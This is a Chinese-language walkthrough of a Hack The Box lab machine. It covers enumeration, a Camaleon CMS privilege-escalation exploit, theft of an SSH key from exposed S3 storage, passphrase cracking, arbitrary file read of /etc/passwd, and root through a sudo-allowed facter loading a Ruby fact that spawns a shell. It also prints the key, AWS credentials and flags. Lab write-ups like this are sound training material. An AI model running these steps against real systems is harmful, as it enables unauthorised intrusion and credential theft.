记录一次htb靶场训练
[I]信息搜集
可以发现这个ip开着两个端口:
1.22端口开放,运行的是SSH服务;
2.80端口开放,运行http服务。
那就可以尝试一下连接http://10.129.61.148/
响应302,重定向至http://facts.htb/。在其首页并没有发现什么有效信息,那就尝试一下爆破路由
gobuster dir -u http://facts.htb/ -w /snap/seclists/1214/Discovery/Web-Content/common.txt -t 100 --exclude-length 11110-11140===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://facts.htb/[+] Method: GET[+] Threads: 100[+] Wordlist: /snap/seclists/1214/Discovery/Web-Content/common.txt[+] Negative Status codes: 404[+] Exclude Length: 11125,11130,11112,11119,11120,11129,11137,11115,11117,11126,11123,11140,11111,11116,11122,11110,11131,11127,11128,11134,11113,11114,11121,11133,11135,11136,11138,11139,11118,11124,11132[+] User Agent: gobuster/3.6[+] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/admin (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]/admin.cgi (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]/admin.php (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]/admin.pl (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]/robots.txt (Status: 200) [Size: 99]/sitemap.gz (Status: 500) [Size: 7918]/sitemap (Status: 200) [Size: 3508]/sitemap.xml (Status: 200) [Size: 3508]/welcome (Status: 200) [Size: 11966]Progress: 4750 / 4750 (100.00%)===============================================================Finished #只列出关键信息===============================================================可以看到一个登录的路由/admin/login,发现有注册入口。
[II]站点提权
先尝试一下弱口令爆破admin,无果;
那就随便注册一个账号:
F / 123123
登录进去后,搜集页面信息
可以发现是一个名为Camaleon的CMS,Version 2.9.0。Camaleon有一个提权漏洞——CVE-2025-2304。因为页面没有任何其他信息了,所以直接使用这个cve的exp尝试提权。
python3 CVE-2025-2304.py -u http://facts.htb/ -U F -P 123123 --newpass 123123[+]Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)[+]Login confirmed User ID: 6 Current User Role: client[+]Loading PPRIVILEGE ESCALATION User ID: 6 Updated User Role: admin[+]Reverting User Role提权成功
[III]连接内网
经过一番二轮信息搜集,我发现了这个页面
发现该站点用户上传的文件都会存储在AWS s3中,而且还给了aws s3的各种信息,这里尝试用aws连一下。
aws configureAWS Access Key ID [****************None]: AKIAA514B10D39766779AWS Secret Access Key [****************None]: bhckFDh3QgtouMvEA7gK369VO6KkJsCHrc00HR9QDefault region name [None]: us-east-1Default output format [None]:=======================================================================================aws --endpoint-url http://facts.htb:54321/ s3 ls2025-09-11 20:06:52 internal2025-09-11 20:06:52 randomfacts可以发现两个s3桶,然后可以发现在s3://internal/.ssh/中有id_ed25519,现在需要将其提取出来。 发现网站中可以访问randomfacts这个桶中的文件:http://facts.htb/randomfacts/thumb/animalejected-png.png,那么我就尝试用aws将 id_ed25519 cp 到 s3://randomfacts/thumb/id.txt中。
aws --endpoint-url http://facts.htb:54321/ s3 cp s3://internal/.ssh/id_ed25519 s3://randomfacts/thumb/id.txtcopy: s3://internal/.ssh/id_ed25519 to s3://randomfacts/thumb/id.txt然后访问http://facts.htb/randomfacts/thumb/id.txt可以下载id.txt,拿到ssh登录密钥。
-----BEGIN OPENSSH PRIVATE KEY-----b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCVTblg0rxxRP3AIwSs6EaXAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIJF26NNgkw+9juA7Gqi2XJoYjY+0NWyX78QPQu4YKE0mAAAAoO/yPQcQPgcoSDhniDY47ky6myp8870thalViS2S+ABRW07PE6/xV8zScKvGcjmq4isr9b+e6MZZQm2uVvTpF2PV1v2vTyyayQFr+Dw7Z67PqqmzuEgV0RDEQrfbJJyMlNP3AgNCW/0bA4oIiHAqhWI3fxQWY0Jr/Ndo/mu0n4alEoTLW49frfU4p4WrU9n/xtoDZQL65ImtSoiFf6q/1f4=-----END OPENSSH PRIVATE KEY-----然后需要爆破这个密钥
cd ~nano id_ed25519#填入这段密钥#由于ssh登录对权限有要求,所以需要chmod改id_ed25519权限chmod 600 id_ed25519ssh2john id_ed25519 > hash.txt #转换成john hashcat hash.txtid_ed25519:$sshng$6$16$954db960d2bc7144fdc02304ace84697$290$6f70656e7373682d6b65792d7631000000000a6165733235362d637472000000066263727970740000001800000010954db960d2bc7144fdc02304ace846970000001800000001000000330000000b7373682d65643235353139000000209176e8d360930fbd8ee03b1aa8b65c9a188d8fb4356c97efc40f42ee18284d26000000a0eff23d07103e0728483867883638ee4cba9b2a7cf3bd2d85a955892d92f800515b4ecf13aff157ccd270abc67239aae22b2bf5bf9ee8c659426dae56f4e91763d5d6fdaf4f2c9ac9016bf83c3b67aecfaaa9b3b84815d110c442b7db249c8c94d3f70203425bfd1b038a0888702a8562377f141663426bfcd768fe6bb49f86a51284cb5b8f5fadf538a785ab53d9ffc6da036502fae489ad4a88857faabfd5fe$24$130======================================================================================john --format=SSH hash.txt --wordlist=~/rockyou.txtUsing default input encoding: UTF-8Loaded 1 password hash (SSH, SSH private key [MD5/bcrypt-pbkdf/[3]DES/AES 32/64])Cracked 1 password hash (is in /home/fortuneee/john/run/john.pot), use "--show"No password hashes left to crack (see FAQ)======================================================================================john --show hash.txtid_ed25519:dragonballz爆破出密码了,然后就是ssh连接。但是我还不知道用户名有哪些,所以我还需要先尝试读取/etc/passwd。这里就要用到Camaleon的另一个任意文件读取漏洞——CVE-2024-46987。
python3 CVE-2024-46987.py -u http://facts.htb/ -l F -p 123123 /etc/passwdroot:x:0:0:root:/root:/bin/bash······ #这里我只列出关键信息,其他用户的shell都是/usr/sbin/nologin以及/bin/false之类trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bashwilliam:x:1001:1001::/home/william:/bin/bash可以发现有/bin/bash权限的除了root之外,只有trivia和awilliam。
读取/home/trivia/.ssh/id_ed25519和/home/william/.ssh/id_ed25519发现只有trivia的ssh密钥可以读取,而且和上面获取到的一样,那么上面爆破出来的密码就是trivia的。然后就是ssh连接了。
ssh -i id_ed25519 trivia@facts.htbEnter passphrase for key 'id_ed25519':Last login: Tue May 12 09:06:00 UTC 2026 from 10.10.14.244 on sshWelcome to Ubuntu 25.04 (GNU/Linux 6.14.0-37-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro
System information as of Tue May 12 01:06:42 PM UTC 2026
System load: 0.0 Usage of /: 73.3% of 7.28GB Memory usage: 19% Swap usage: 0% Processes: 221 Users logged in: 1 IPv4 address for eth0: 10.129.61.148 IPv6 address for eth0: dead:beef::a0de:adff:fe60:9aaf
0 updates can be applied immediately.
The list of available updates is more than a week old.To check for new updates run: sudo apt updateFailed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings
#成功进入trivia@facts:~$[IV]内网提权
trivia@facts:~$ sudo -lMatching Defaults entries for trivia on facts: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User trivia may run the following commands on facts: (ALL) NOPASSWD: /usr/bin/facter这里使用sudo -l查看trivia可以用sudo执行哪些命令。后面查看了william的发现也一样,查看过程中发现了User flag,在 /home/william/user.txt 中 :56c71ceabde5a54451efe6ab758af75f 这里知道了trivia可以执行/usr/bin/facter,而facter可以支持加载自定义Ruby代码,那么我们就可以利用factor执行Ruby代码来实现提权。 通过 sudo /usr/bin/facter —help 可以发现这个靶机中的facter版本支持 —custom-dir ,那么就可以直接打了,后面来解释提权原理。
trivia@facts:~$ cd /tmp
trivia@facts:~$ cat > x.rb << 'EOF'Facter.add(:pwned) do setcode do exec('/bin/sh') endendEOF
trivia@facts:~$ sudo /usr/bin/facter --custom-dir=/tmp pwned# whoamiroot #这里成功提权了# ls /rootminio-binaries ministack root.txt snap# cat /root/root.txt49ed8d1b599339bda221a132af3a8544成功拿到root flag : 49ed8d1b599339bda221a132af3a8544
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
现在开始解释这部分提权:
[+] cd /tmp 是为了拿到可写文件的目录,而我则是为了写恶意Ruby文件来提权
[+] 写恶意Ruby
cat > x.rb << 'EOF'Facter.add(:pwned) do setcode do exec('/bin/sh') #拿shell endendEOF[+]sudo /usr/bin/facter —custom-dir=/tmp pwned 执行恶意Ruby。启动facter然后让facter扫描/tmp目录中的名为 pwned 的 fact 然后就会执行 exec(‘/bin/sh’) ,最终拿到shell。
这里—custom-dir的作用就是扩展facter的读取路径,本来只是读取 /etc/puppetlabs/facter/facts.d/ 之类的目录,—custom-dir=/tmp之后就能让facter读取特定路径的facts了。
部分信息可能已经过时